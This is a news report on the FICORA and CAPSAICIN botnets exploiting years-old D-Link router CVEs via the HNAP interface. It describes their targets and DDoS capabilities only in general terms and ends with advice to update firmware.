Recent cyberattacks targeting vulnerable D-Link routers have raised concerns within the cybersecurity community, as documented vulnerabilities originally discovered years ago are being actively exploited once again. The resurgence of these attacks has been attributed to two distinct botnets: a Mirai variant named FICORA and a Kaiten variant known as CAPSAICIN, which leverage these weaknesses to cause significant disruption.
Exploited Vulnerabilities Persist Despite Patches
Cybersecurity researchers have highlighted that these botnets take advantage of long-known vulnerabilities in D-Link routers, some of which date back nearly a decade. Several critical CVEs, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112, exploit the Home Network Administration Protocol (HNAP) interface, providing a gateway for attackers despite patches having been available for years. This enduring issue underscores the ongoing risk posed by legacy devices that have not been properly updated.
Distinct Targets and Attack Methods
The FICORA botnet casts a wide net, targeting countries globally with its sophisticated attack mechanisms. Once a vulnerable router is compromised, FICORA deploys a downloader shell script from a remote server, which retrieves the primary payload suitable for various Linux architectures using commands such as wget, ftpget, curl, and tftp. Furthermore, this botnet incorporates a brute-force attack function that utilizes a hard-coded list of usernames and passwords, enhancing its ability to conduct distributed denial-of-service (DDoS) attacks across UDP, TCP, and DNS protocols.
On the other hand, the CAPSAICIN botnet focuses its efforts on East Asia, especially Japan and Taiwan, with peak activity observed between October 21-22, 2024. This variant employs a different IP address for payload downloads and ensures compatibility with diverse Linux architectures. Notably, CAPSAICIN eliminates other known botnet processes to become the dominant botnet on the affected device, creating a connection with its command-and-control server to forward the victim’s operating system information and assigned nickname, awaiting further instructions.
Commands and Techniques Utilized by CAPSAICIN
CAPSAICIN stands out with its versatility in operations, capable of executing various commands such as obtaining IP addresses, deleting command histories, initiating proxies, changing nicknames, downloading files, and running shell commands. Its DDoS attack capabilities are notable, with specific attacks including HTTP flooding, TCP connection flooding, DNS amplification, and BlackNurse attacks. This breadth of functionality makes CAPSAICIN a formidable threat to affected networks.
The Continued Threat of Legacy Vulnerabilities
Recent cyberattacks targeting vulnerable D-Link routers have triggered alarm bells within the cybersecurity community. These routers are being actively exploited through documented vulnerabilities that were originally discovered years ago. The reemergence of these attacks has been attributed to the activities of two distinct botnets: a Mirai variant known as FICORA and a Kaiten variant called CAPSAICIN. These malicious networks leverage longstanding weaknesses to cause considerable disruption, making it crucial for users to be aware of potential risks.
The Mirai botnet, infamous for its role in significant past cyberattacks, continues to evolve, now adopting the FICORA variant to exploit these D-Link router vulnerabilities. Similarly, the Kaiten botnet’s CAPSAICIN variant has been recognized for effectively capitalizing on the same weaknesses. This resurgence emphasizes the importance of regular updates and patches for network devices, as outdated firmware remains a significant security risk. Cybersecurity experts urge users to ensure their devices are running the latest firmware versions to mitigate these threats.